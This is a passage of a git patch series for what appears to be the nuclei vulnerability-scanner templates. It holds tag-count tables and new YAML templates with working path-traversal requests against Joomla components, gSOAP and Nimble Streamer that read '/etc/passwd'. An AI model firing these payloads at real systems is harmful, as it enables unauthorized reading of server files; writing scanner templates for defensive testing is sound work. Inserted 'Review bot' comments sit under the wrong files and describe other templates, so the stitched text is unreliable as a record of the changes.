| -| discord | 1 | | | | | | | | | +| tenda | 1 | | | | | | | | | +| xml | 1 | | | | | | | | | +| cse | 1 | | | | | | | | | +| openemr 
| 1 | | | | | | | | | +| enumeration | 1 | | | | | | | | | +| zcms | 1 | | | | | | | | | +| sqlite | 1 | | | | | | | | | +| sage | 1 | | | | | | | | | +| achecker | 1 | | | | | | | | | +| xunchi | 1 | | | | | | | | | +| maccmsv10 | 1 | | | | | | | | | +| erp-nc | 1 | | | | | | | | | +| plastic | 1 | | | | | | | | | +| weiphp | 1 | | | | | | | | | +| circontrol | 1 | | | | | | | | | +| zyxel | 1 | | | | | | | | | +| emby | 1 | | | | | | | | | +| sitecore | 1 | | | | | | | | | +| myucms | 1 | | | | | | | | | +| tensorflow | 1 | | | | | | | | | +| haproxy | 1 | | | | | | | | | +| 2014 | 1 | | | | | | | | | +| cherokee | 1 | | | | | | | | | +| lotuscms | 1 | | | | | | | | | +| sophos | 1 | | | | | | | | | +| jquery | 1 | | | | | | | | | +| enum | 1 | | | | | | | | | +| keenetic | 1 | | | | | | | | | +| upload | 1 | | | | | | | | | +| acexy | 1 | | | | | | | | | +| comodo | 1 | | | | | | | | | +| mysql | 1 | | | | | | | | | +| opentsdb | 1 | | | | | | | | | +| mariadb | 1 | | | | | | | | | +| flash | 1 | | | | | | | | | +| trane | 1 | | | | | | | | | +| gateone | 1 | | | | | | | | | +| gridx | 1 | | | | | | | | | +| phpinfo | 1 | | | | | | | | | +| rujjie | 1 | | | | | | | | | +| office365 | 1 | | | | | | | | | +| soar | 1 | | | | | | | | | +| scs | 1 | | | | | | | | | +| bookstack | 1 | | | | | | | | | +| qvisdvr | 1 | | | | | | | | | +| klog | 1 | | | | | | | | | +| zookeeper | 1 | | | | | | | | | +| sureline | 1 | | | | | | | | | +| checkpoint | 1 | | | | | | | | | +| smartsense | 1 | | | | | | | | | +| arl | 1 | | | | | | | | | +| trilithic | 1 | | | | | | | | | +| miscrsoft | 1 | | | | | | | | | | phpfastcache | 1 | | | | | | | | | -| fuelcms | 1 | | | | | | | | | -| cocoon | 1 | | | | | | | | | +| linksys | 1 | | | | | | | | | +| zend | 1 | | | | | | | | | +| qcubed | 1 | | | | | | | | | +| gitlist | 1 | | | | | | | | | +| lansweeper | 1 | | | | | | | | | +| yii | 1 | | | | | | | | | +| ssl | 1 | | | | | | | | | +| mara | 1 | | | | | | | | | +| opensmtpd | 1 | | | 
| | | | | | +| mpsec | 1 | | | | | | | | | +| tongda | 1 | | | | | | | | | +| clickhouse | 1 | | | | | | | | | +| visualtools | 1 | | | | | | | | | +| concrete | 1 | | | | | | | | | +| flink | 1 | | | | | | | | | +| sidekiq | 1 | | | | | | | | | +| razor | 1 | | | | | | | | | +| cyberoam | 1 | | | | | | | | | +| kubeflow | 1 | | | | | | | | | +| mdb | 1 | | | | | | | | | +| lutron | 1 | | | | | | | | | +| lancom | 1 | | | | | | | | | +| yachtcontrol | 1 | | | | | | | | | +| mantis | 1 | | | | | | | | | +| moinmoin | 1 | | | | | | | | | +| commscope | 1 | | | | | | | | | +| drone | 1 | | | | | | | | | +| twitter-server | 1 | | | | | | | | | +| discord | 1 | | | | | | | | | +| webui | 1 | | | | | | | | | +| expn | 1 | | | | | | | | | +| vidyo | 1 | | | | | | | | | +| fastcgi | 1 | | | | | | | | | +| woocomernce | 1 | | | | | | | | | +| solman | 1 | | | | | | | | | +| tileserver | 1 | | | | | | | | | +| mirai | 1 | | | | | | | | | +| fortinet | 1 | | | | | | | | | +| spip | 1 | | | | | | | | | +| feifeicms | 1 | | | | | | | | | +| fortiweb | 1 | | | | | | | | | +| rdp | 1 | | | | | | | | | +| favicon | 1 | | | | | | | | | +| servicedesk | 1 | | | | | | | | | +| alibaba | 1 | | | | | | | | | +| owasp | 1 | | | | | | | | | +| crm | 1 | | | | | | | | | +| linux | 1 | | | | | | | | | +| default-login | 1 | | | | | | | | | +| jnoj | 1 | | | | | | | | | +| chevereto | 1 | | | | | | | | | +| stem | 1 | | | | | | | | | +| expressjs | 1 | | | | | | | | | +| clockwatch | 1 | | | | | | | | | +| postgres | 1 | | | | | | | | | +| rabbitmq | 1 | | | | | | | | | +| centreon | 1 | | | | | | | | | +| auth | 1 | | | | | | | | | +| bazarr | 1 | | | | | | | | | +| octobercms | 1 | | | | | | | | | +| upnp | 1 | | | | | | | | | +| visionhub | 1 | | | | | | | | | +| phalcon | 1 | | | | | | | | | +| ems | 1 | | | | | | | | | +| szhe | 1 | | | | | | | | | +| viewpoint | 1 | | | | | | | | | +| clusterengine | 1 | | | | | | | | | +| starttls | 1 | | | | | | | | | +| jenkin | 1 | | | | | | | | | 
+| kyan | 1 | | | | | | | | | +| qdpm | 1 | | | | | | | | | +| oscommerce | 1 | | | | | | | | | +| servicenow | 1 | | | | | | | | | +| cerebro | 1 | | | | | | | | | +| webftp | 1 | | | | | | | | | +| dotnet | 1 | | | | | | | | | +| memcached | 1 | | | | | | | | | +| robomongo | 1 | | | | | | | | | +| floc | 1 | | | | | | | | | +| openstack | 1 | | | | | | | | | +| cloudinary | 1 | | | | | | | | | +| duomicms | 1 | | | | | | | | | +| blue-ocean | 1 | | | | | | | | | +| powercreator | 1 | | | | | | | | | +| tamronos | 1 | | | | | | | | | +| redcap | 1 | | | | | | | | | +| csrf | 1 | | | | | | | | | +| sceditor | 1 | | | | | | | | | +| htmli | 1 | | | | | | | | | +| camera | 1 | | | | | | | | | +| dnssec | 1 | | | | | | | | | +| exacqvision | 1 | | | | | | | | | +| fortilogger | 1 | | | | | | | | | +| svn | 1 | | | | | | | | | +| majordomo2 | 1 | | | | | | | | | +| exposures | 1 | | | | | | | | | +| default | 1 | | | | | | | | | +| hiawatha | 1 | | | | | | | | | +| ewebs | 1 | | | | | | | | | +| mongoshake | 1 | | | | | | | | | +| opencast | 1 | | | | | | | | | +| javamelody | 1 | | | | | | | | | +| empirecms | 1 | | | | | | | | | +| ganglia | 1 | | | | | | | | | | bullwark | 1 | | | | | | | | | +| tensorboard | 1 | | | | | | | | | +| fedora | 1 | | | | | | | | | +| diris | 1 | | | | | | | | | +| opensns | 1 | | | | | | | | | +| cocoon | 1 | | | | | | | | | +| wing-ftp | 1 | | | | | | | | | +| nomad | 1 | | | | | | | | | +| tjws | 1 | | | | | | | | | +| vsftpd | 1 | | | | | | | | | +| svnserve | 1 | | | | | | | | | +| zzzcms | 1 | | | | | | | | | +| pippoint | 1 | | | | | | | | | +| hadoop | 1 | | | | | | | | | +| zmanda | 1 | | | | | | | | | +| wifisky | 1 | | | | | | | | | +| darkstat | 1 | | | | | | | | | +| sarg | 1 | | | | | | | | | +| smi | 1 | | | | | | | | | +| magicflow | 1 | | | | | | | | | +| perl | 1 | | | | | | | | | +| plone | 1 | | | | | | | | | +| huijietong | 1 | | | | | | | | | +| fortigate | 1 | | | | | | | | | +| krweb | 1 | | | | | | | | | +| 
nordex | 1 | | | | | | | | | +| jfrog | 1 | | | | | | | | | +| wavlink | 1 | | | | | | | | | +| camunda | 1 | | | | | | | | | +| extractor | 1 | | | | | | | | | +| wiki | 1 | | | | | | | | | +| froxlor | 1 | | | | | | | | | +| redwood | 1 | | | | | | | | | +| kong | 1 | | | | | | | | | +| mobileiron | 1 | | | | | | | | | +| salesforce | 1 | | | | | | | | | +| ambari | 1 | | | | | | | | | +| pacsone | 1 | | | | | | | | | +| saltapi | 1 | | | | | | | | | +| sar2html | 1 | | | | | | | | | +| rmi | 1 | | | | | | | | | +| ruby | 1 | | | | | | | | | +| db | 1 | | | | | | | | | +| processmaker | 1 | | | | | | | | | +| cgi | 1 | | | | | | | | | +| apiman | 1 | | | | | | | | | +| portainer | 1 | | | | | | | | | +| elascticsearch | 1 | | | | | | | | | +| nette | 1 | | | | | | | | | +| mantisbt | 1 | | | | | | | | | +| simplecrm | 1 | | | | | | | | | +| centos | 1 | | | | | | | | | +| netsweeper | 1 | | | | | | | | | +| emc | 1 | | | | | | | | | +| tika | 1 | | | | | | | | | +| zeroshell | 1 | | | | | | | | | +| aura | 1 | | | | | | | | | +| tracer | 1 | | | | | | | | | +| octoprint | 1 | | | | | | | | | +| sgp | 1 | | | | | | | | | +| pagespeed | 1 | | | | | | | | | +| shopxo | 1 | | | | | | | | | +| acme | 1 | | | | | | | | | +| argussurveillance | 1 | | | | | | | | | +| jmx | 1 | | | | | | | | | +| realteo | 1 | | | | | | | | | +| cve2006 | 1 | | | | | | | | | +| opm | 1 | | | | | | | | | +| xff | 1 | | | | | | | | | +| dbeaver | 1 | | | | | | | | | +| xmlchart | 1 | | | | | | | | | +| heroku | 1 | | | | | | | | | +| linkedin | 1 | | | | | | | | | +| iceflow | 1 | | | | | | | | | +| ilo4 | 1 | | | | | | | | | +| chinaunicom | 1 | | | | | | | | | +| owa | 1 | | | | | | | | | +| asus | 1 | | | | | | | | | +| monitorix | 1 | | | | | | | | | +| mautic | 1 | | | | | | | | | +| dotclear | 1 | | | | | | | | | +| labtech | 1 | | | | | | | | | +| traefik | 1 | | | | | | | | | +| tpshop | 1 | | | | | | | | | +| phpfusion | 1 | | | | | | | | | +| phpunit | 1 | | | | | | | | | +| 
eyelock | 1 | | | | | | | | | +| spidercontrol | 1 | | | | | | | | | +| wamp | 1 | | | | | | | | | +| livezilla | 1 | | | | | | | | | +| plc | 1 | | | | | | | | | +| cobub | 1 | | | | | | | | | +| ulterius | 1 | | | | | | | | | +| idemia | 1 | | | | | | | | | +| nuuo | 1 | | | | | | | | | +| wildfly | 1 | | | | | | | | | +| expose | 1 | | | | | | | | | +| sprintful | 1 | | | | | | | | | +| wmt | 1 | | | | | | | | | +| st | 1 | | | | | | | | | +| mongo | 1 | | | | | | | | | +| dompdf | 1 | | | | | | | | | +| ricoh | 1 | | | | | | | | | +| panabit | 1 | | | | | | | | | +| oneblog | 1 | | | | | | | | | +| sangfor | 1 | | | | | | | | | +| acontent | 1 | | | | | | | | | +| jsp | 1 | | | | | | | | | +| geutebruck | 1 | | | | | | | | | +| nuxeo | 1 | | | | | | | | | +| rfi | 1 | | | | | | | | | +| ssltls | 1 | | | | | | | | | +| zte | 1 | | | | | | | | | +| couchbase | 1 | | | | | | | | | +| kerbynet | 1 | | | | | | | | | +| proftpd | 1 | | | | | | | | | +| metinfo | 1 | | | | | | | | | +| parentlink | 1 | | | | | | | | | +| fiori | 1 | | | | | | | | | +| manageengine | 1 | | | | | | | | | +| esmtp | 1 | | | | | | | | | +| swagger | 1 | | | | | | | | | +| accela | 1 | | | | | | | | | +| grails | 1 | | | | | | | | | +| commax | 1 | | | | | | | | | +| timesheet | 1 | | | | | | | | | +| resourcespace | 1 | | | | | | | | | +| spectracom | 1 | | | | | | | | | +| bitly | 1 | | | | | | | | | +| announcekit | 1 | | | | | | | | | +| ruckus | 1 | | | | | | | | | +| lanproxy | 1 | | | | | | | | | +| sourcebans | 1 | | | | | | | | | +| nedi | 1 | | | | | | | | | +| druid | 1 | | | | | | | | | +| aspnuke | 1 | | | | | | | | | +| dvwa | 1 | | | | | | | | | +| nweb2fax | 1 | | | | | | | | | +| websvn | 1 | | | | | | | | | +| thinkadmin | 1 | | | | | | | | | +| email | 1 | | | | | | | | | +| viewlinc | 1 | | | | | | | | | +| panos | 1 | | | | | | | | | +| openerp | 1 | | | | | | | | | +| geddy | 1 | | | | | | | | | +| cors | 1 | | | | | | | | | +| wondercms | 1 | | | | | | | | | +| 
payara | 1 | | | | | | | | | +| varnish | 1 | | | | | | | | | +| selea | 1 | | | | | | | | | +| redis | 1 | | | | | | | | | +| zarafa | 1 | | | | | | | | | +| getsimple | 1 | | | | | | | | | +| circontrorl | 1 | | | | | | | | | +| openx | 1 | | | | | | | | | +| webmodule-ee | 1 | | | | | | | | | +| pgadmin | 1 | | | | | | | | | +| k8s | 1 | | | | | | | | | +| bedita | 1 | | | | | | | | | +| sco | 1 | | | | | | | | | +| cves2016 | 1 | | | | | | | | | +| mailchimp | 1 | | | | | | | | | +| netmask | 1 | | | | | | | | | +| harbor | 1 | | | | | | | | | +| xdcms | 1 | | | | | | | | | +| azkaban | 1 | | | | | | | | | +| bolt | 1 | | | | | | | | | +| lg-nas | 1 | | | | | | | | | +| anchorcms | 1 | | | | | | | | | +| moin | 1 | | | | | | | | | +| jeewms | 1 | | | | | | | | | +| calendarix | 1 | | | | | | | | | +| tectuus | 1 | | | | | | | | | +| beanshell | 1 | | | | | | | | | +| hiboss | 1 | | | | | | | | | +| ioncube | 1 | | | | | | | | | +| optiLink | 1 | | | | | | | | | +| rmc | 1 | | | | | | | | | +| yealink | 1 | | | | | | | | | +| skywalking | 1 | | | | | | | | | +| redhat | 1 | | | | | | | | | +| hortonworks | 1 | | | | | | | | | +| h3c-imc | 1 | | | | | | | | | +| totaljs | 1 | | | | | | | | | +| goahead | 1 | | | | | | | | | +| doh | 1 | | | | | | | | | +| ns | 1 | | | | | | | | | +| uwsgi | 1 | | | | | | | | | +| apos | 1 | | | | | | | | | +| node-red-dashboard | 1 | | | | | | | | | +| jenzabar | 1 | | | | | | | | | +| wooyun | 1 | | | | | | | | | +| embedthis | 1 | | | | | | | | | +| adminer | 1 | | | | | | | | | +| landrayoa | 1 | | | | | | | | | +| landray | 1 | | | | | | | | | +| domxss | 1 | | | | | | | | | +| iptime | 1 | | | | | | | | | +| cofax | 1 | | | | | | | | | +| spring | 1 | | | | | | | | | +| javafaces | 1 | | | | | | | | | +| glances | 1 | | | | | | | | | +| gotmls | 1 | | | | | | | | | +| wuzhicms | 1 | | | | | | | | | +| graphite | 1 | | | | | | | | | +| ghost | 1 | | | | | | | | | +| synnefo | 1 | | | | | | | | | +| lighttpd | 1 | | | | | | | 
| | +| zenario | 1 | | | | | | | | | +| aruba | 1 | | | | | | | | | +| eyou | 1 | | | | | | | | | +| netdata | 1 | | | | | | | | | +| webadmin | 1 | | | | | | | | | +| sentry | 1 | | | | | | | | | +| pulsesecure | 1 | | | | | | | | | +| b2evolution | 1 | | | | | | | | | +| kafdrop | 1 | | | | | | | | | +| csod | 1 | | | | | | | | | +| tieline | 1 | | | | | | | | | +| fortigates | 1 | | | | | | | | | +| liferay | 1 | | | | | | | | | +| subrion | 1 | | | | | | | | | +| plugin | 1 | | | | | | | | | +| faraday | 1 | | | | | | | | | +| ecom | 1 | | | | | | | | | +| tapestry | 1 | | | | | | | | | +| episerver | 1 | | | | | | | | | +| zm | 1 | | | | | | | | | +| setup | 1 | | | | | | | | | +| blind | 1 | | | | | | | | | +| triconsole | 1 | | | | | | | | | +| socomec | 1 | | | | | | | | | +| webmin | 1 | | | | | | | | | +| mediumish | 1 | | | | | | | | | +| discourse | 1 | | | | | | | | | +| pcoip | 1 | | | | | | | | | +| k8 | 1 | | | | | | | | | +| jitsi | 1 | | | | | | | | | +| rhymix | 1 | | | | | | | | | +| postmessage | 1 | | | | | | | | | +| dvr | 1 | | | | | | | | | +| fuelcms | 1 | | | | | | | | | +| ilo | 1 | | | | | | | | | +| seacms | 1 | | | | | | | | | +| ntopng | 1 | | | | | | | | | +| javascript | 1 | | | | | | | | | +| addpac | 1 | | | | | | | | | +| pyramid | 1 | | | | | | | | | +| adb | 1 | | | | | | | | | +| openrestry | 1 | | | | | | | | | +| gespage | 1 | | | | | | | | | +| xiuno | 1 | | | | | | | | | +| rubedo | 1 | | | | | | | | | +| xvr | 1 | | | | | | | | | +| wazuh | 1 | | | | | | | | | +| dotnetnuke | 1 | | | | | | | | | +| wavemaker | 1 | | | | | | | | | +| appweb | 1 | | | | | | | | | +| ueditor | 1 | | | | | | | | | +| timeclock | 1 | | | | | | | | | +| gogs | 1 | | | | | | | | | +| nps | 1 | | | | | | | | | +| fastapi | 1 | | | | | | | | | +| monitorr | 1 | | | | | | | | | +| craftcms | 1 | | | | | | | | | +| bigbluebutton | 1 | | | | | | | | | +| whm | 1 | | | | | | | | | +| meraki | 1 | | | | | | | | | +| vscode | 1 | | | | | | | | | +| 
blackboard | 1 | | | | | | | | | +| alerta | 1 | | | | | | | | | +| shopware | 1 | | | | | | | | | +| qsan | 1 | | | | | | | | | +| avalanche | 1 | | | | | | | | | +| logontracer | 1 | | | | | | | | | +| springframework | 1 | | | | | | | | | +| bruteforce | 1 | | | | | | | | | +| biometrics | 1 | | | | | | | | | +| netgenie | 1 | | | | | | | | | +| finereport | 1 | | | | | | | | | +| avtech | 1 | | | | | | | | | +| codemeter | 1 | | | | | | | | | diff --git a/TOP-10.md b/TOP-10.md index 69f64f98aa..869329e073 100644 --- a/TOP-10.md +++ b/TOP-10.md 
@@ -1,12 +1,12 @@ | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 | -| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 | -| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 | -| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 | -| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | | -| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | -| rce | 190 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | | -| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | | -| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | | +| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | +| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | +| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | +| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | +| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | +| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | +| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | +| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | +| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | | +| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | | From 4c0691f09fc4881cacd23ff2324b2c8288c5b47c Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sat, 4 Sep 2021 11:19:04 +0000 Subject: [PATCH 045/339] Auto Update README [Sat Sep 4 11:19:04 UTC 2021] :robot: --- README.md | 22 +++++++++++----------- 1 file changed, 11 insertions(+), 11 deletions(-) 
diff --git a/README.md b/README.md index a447037293..5487e31afc 100644 --- a/README.md +++ b/README.md @@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags, | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| -| cve | 649 | dhiyaneshdk | 245 | cves | 657 | info | 610 | http | 1833 | -| panel | 236 | pikpikcu | 244 | vulnerabilities | 284 | high | 526 | file | 46 | -| xss | 224 | pdteam | 198 | exposed-panels | 235 | medium | 406 | network | 39 | -| lfi | 221 | daffainfo | 176 | exposures | 185 | critical | 232 | dns | 11 | -| exposure | 217 | geeknik | 149 | technologies | 164 | low | 160 | | | -| wordpress | 205 | dwisiswant0 | 132 | misconfiguration | 125 | | | | | -| rce | 190 | gy741 | 72 | takeovers | 71 | | | | | -| cve2020 | 157 | madrobot | 62 | default-logins | 52 | | | | | -| wp-plugin | 138 | princechaddha | 54 | file | 46 | | | | | -| tech | 106 | pussycat0x | 48 | workflows | 35 | | | | | +| cve | 666 | dhiyaneshdk | 248 | cves | 674 | info | 615 | http | 1859 | +| panel | 236 | pikpikcu | 246 | vulnerabilities | 284 | high | 535 | file | 46 | +| lfi | 228 | pdteam | 198 | exposed-panels | 235 | medium | 413 | network | 39 | +| xss | 225 | daffainfo | 183 | exposures | 186 | critical | 236 | dns | 11 | +| exposure | 221 | geeknik | 150 | technologies | 170 | low | 161 | | | +| wordpress | 206 | dwisiswant0 | 132 | misconfiguration | 129 | | | | | +| rce | 193 | gy741 | 72 | takeovers | 71 | | | | | +| cve2020 | 159 | madrobot | 62 | default-logins | 54 | | | | | +| wp-plugin | 139 | princechaddha | 55 | file | 46 | | | | | +| cve2021 | 112 | pussycat0x | 55 | workflows | 35 | | | | | -**147 directories, 1989 files**. +**150 directories, 2015 files**. From b0900aacdb9bf2445254dd26b9024f26f57b5dbc Mon Sep 17 00:00:00 2001 
From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sat, 4 Sep 2021 14:29:07 -0500 Subject: [PATCH 046/339] Create ibm-security-access-manager.yaml --- .../ibm-security-access-manager.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/ibm-security-access-manager.yaml
diff --git a/exposed-panels/ibm-security-access-manager.yaml b/exposed-panels/ibm-security-access-manager.yaml
new file mode 100644
index 0000000000..91e521e81c
--- /dev/null
+++ b/exposed-panels/ibm-security-access-manager.yaml
@@ -0,0 +1,29 @@
+id: ibm-security-access-manager
+
+info:
+ name: Detects IBM Security Access Manager
+ description: IBM Security Access Manager is a complete authorization and network security policy management solution. It provides end-to-end protection of resources over geographically dispersed intranets and extranets.
+ reference: https://www.ibm.com/docs/en/sva/9.0.7?topic=overview-introduction-security-access-manager
+ author: geeknik
+ severity: info
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+ - type: word
+ words:
+ - "IBM Security Access Manager"
+ - "<h2>IBM Security"
+ - "<em>Access Manager"
+ condition: and
+ - type: word
+ part: header
+ words:
+ - "text/html"
From ef9055b4f0169cab9875941759475668361e7d5d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 5 Sep 2021 08:55:43 +0700 Subject: [PATCH 047/339] Create CVE-2010-1312.yaml --- cves/2010/CVE-2010-1312.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1312.yaml
diff --git a/cves/2010/CVE-2010-1312.yaml b/cves/2010/CVE-2010-1312.yaml
new file mode 100644
index 0000000000..022a54afd8
--- /dev/null
+++ b/cves/2010/CVE-2010-1312.yaml
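Review bot: The `info` block of the new template has no `tags:` entry, while every other template added in this series carries one (`tags: cve,cve2010,joomla,lfi` two commits later), so this detector cannot be selected or excluded by tag; add a line such as `tags: panel,ibm` below `severity: info`. The `name:` is phrased as an action ("Detects IBM Security Access Manager") rather than naming the product as the neighbouring templates do; `name: IBM Security Access Manager Login Panel` reads consistently with the `panel` tag and the `exposed-panels/` directory the file is placed in.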
@@ -0,0 +1,27 @@
+id: CVE-2010-1312
+
+info:
+ name: Joomla! Component News Portal 1.5.x - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the iJoomla News Portal (com_news_portal) component 1.5.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12077
+ - https://www.cvedetails.com/cve/CVE-2010-1312
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
From 06fba0c78d6f7da0a34e3891b54cb42758d629e0 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 5 Sep 2021 09:03:48 +0700 Subject: [PATCH 048/339] Create CVE-2010-1473.yaml --- cves/2010/CVE-2010-1473.yaml | 27 +++++++++++++++++++++++++++ 1 file changed, 27 insertions(+) create mode 100644 cves/2010/CVE-2010-1473.yaml
diff --git a/cves/2010/CVE-2010-1473.yaml b/cves/2010/CVE-2010-1473.yaml
new file mode 100644
index 0000000000..c2e7878067
--- /dev/null
+++ b/cves/2010/CVE-2010-1473.yaml
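Review bot: The regex matcher `root:.*:0:0` is looser than the `root:[x*]:0:0` form used by the gSOAP and CVE-2019-11013 templates added in the next two commits; with `.*`, any line that echoes `root:` somewhere before `:0:0` satisfies it, so a page that merely reflects request text can produce a high-severity result. Tightening it to `- "root:[x*]:0:0"` keeps the batch consistent and reduces false positives. The CVE-2010-1473 hunk in the following commit has the same matcher and needs the same change.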
@@ -0,0 +1,27 @@
+id: CVE-2010-1473
+
+info:
+ name: Joomla! Component Advertising 0.25 - Local File Inclusion
+ author: daffainfo
+ severity: high
+ description: Directory traversal vulnerability in the Advertising (com_advertising) component 0.25 for Joomla! allows remote attackers to read arbitrary files and possibly have unspecified other impact via a .. (dot dot) in the controller parameter to index.php.
+ reference:
+ - https://www.exploit-db.com/exploits/12171
+ - https://www.cvedetails.com/cve/CVE-2010-1473
+ tags: cve,cve2010,joomla,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:.*:0:0"
+
+ - type: status
+ status:
+ - 200
From e96b94242fa75b1eb76d49f0f4a77b097db6b747 Mon Sep 17 00:00:00 2001 From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 5 Sep 2021 12:07:47 +0900 Subject: [PATCH 049/339] Create gSOAP-LFl.yaml --- gSOAP-LFl.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 gSOAP-LFl.yaml
diff --git a/gSOAP-LFl.yaml b/gSOAP-LFl.yaml
new file mode 100644
index 0000000000..f7bd7c67e7
--- /dev/null
+++ b/gSOAP-LFl.yaml
@@ -0,0 +1,24 @@
+id: gsoap-lfi
+
+info:
+ name: gSOAP 2.8 - Directory Traversal
+ author: 0x_Akoko
+ severity: high
+ reference: https://www.exploit-db.com/exploits/47653
+ tags: gsoap,lfi
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/../../../../../../../../../etc/passwd"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
From f8e19ea1d258d60a5d4889e8afcb619801daf8e3 Mon Sep 17 00:00:00 2001
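Review bot: The new file is named `gSOAP-LFl.yaml` (a lowercase l rather than I in "LFI") and is created at the repository root, while every other template in this series lives in a category directory (`cves/<year>/`, `exposed-panels/`); rename it to `gsoap-lfi.yaml` to match its `id:` and move it under a category such as `vulnerabilities/` so that directory-based runs and the generated counts in README.md include it. The `info` block also has no `description:` line; a one-sentence summary of the traversal, as the Joomla templates in this series provide, would be worth adding.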
From: Roberto Nunes <46332131+Akokonunes@users.noreply.github.com> Date: Sun, 5 Sep 2021 12:10:02 +0900 Subject: [PATCH 050/339] Create CVE-2019-11013.yaml --- CVE-2019-11013.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 CVE-2019-11013.yaml
diff --git a/CVE-2019-11013.yaml b/CVE-2019-11013.yaml
new file mode 100644
index 0000000000..680aabcde6
--- /dev/null
+++ b/CVE-2019-11013.yaml
@@ -0,0 +1,24 @@
+id: CVE-2019-11013
+
+info:
+ name: Nimble Streamer 3.0.2-2 to 3.5.4-9 - Path Traversal
+ author: 0x_Akoko
+ severity: high
+ reference: https://www.exploit-db.com/exploits/47301
+ tags: cves,lfi,nimble
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/demo/file/../../../../../../../../etc/passwd%00filename.mp4/chunk.m3u8?nimblesessionid=1484448"
+
+ matchers-condition: and
+ matchers:
+
+ - type: regex
+ regex:
+ - "root:[x*]:0:0"
+
+ - type: status
+ status:
+ - 200
From 062487f9e8288b80e8420acf0c5518e0bf8633d6 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Sun, 5 Sep 2021 17:12:40 +0700 Subject: [PATCH 051/339] Create CVE-2021-29625.yaml --- cves/2021/CVE-2021-29625.yaml | 32 ++++++++++++++++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 cves/2021/CVE-2021-29625.yaml
diff --git a/cves/2021/CVE-2021-29625.yaml b/cves/2021/CVE-2021-29625.yaml
new file mode 100644
index 0000000000..65318224ba
--- /dev/null
+++ b/cves/2021/CVE-2021-29625.yaml
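Review bot: `tags: cves,lfi,nimble` uses `cves` where the other CVE templates on this page use `cve,cve<year>` (`tags: cve,cve2010,joomla,lfi`, `tags: cve,cve2021,adminer,xss`), so a `cve` tag filter would skip this template; change it to `tags: cve,cve2019,nimble,lfi`. The file is also created at the repository root rather than under `cves/2019/` like the other CVE templates, and `info` has no `description:`; add one and list the NVD entry alongside the Exploit-DB reference, as the CVE-2019-18818 template does.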
@@ -0,0 +1,32 @@
+id: CVE-2021-29625
+
+info:
+ name: Adminer reflected XSS via the table parameter
+ author: daffainfo
+ description: Adminer is open-source database management software. A cross-site scripting vulnerability in Adminer versions 4.6.1 to 4.8.0 affects users of MySQL, MariaDB, PgSQL and SQLite. XSS is in most cases prevented by strict CSP in all modern browsers. The only exception is when Adminer is using a `pdo_` extension to communicate with the database (it is used if the native extensions are not enabled). In browsers without CSP, Adminer versions 4.6.1 to 4.8.0 are affected. The vulnerability is patched in version 4.8.1. As workarounds, one can use a browser supporting strict CSP or enable the native PHP extensions (e.g. `mysqli`) or disable displaying PHP errors (`display_errors`).
+ severity: medium
+ reference:
+ - https://sourceforge.net/p/adminer/bugs-and-features/797/
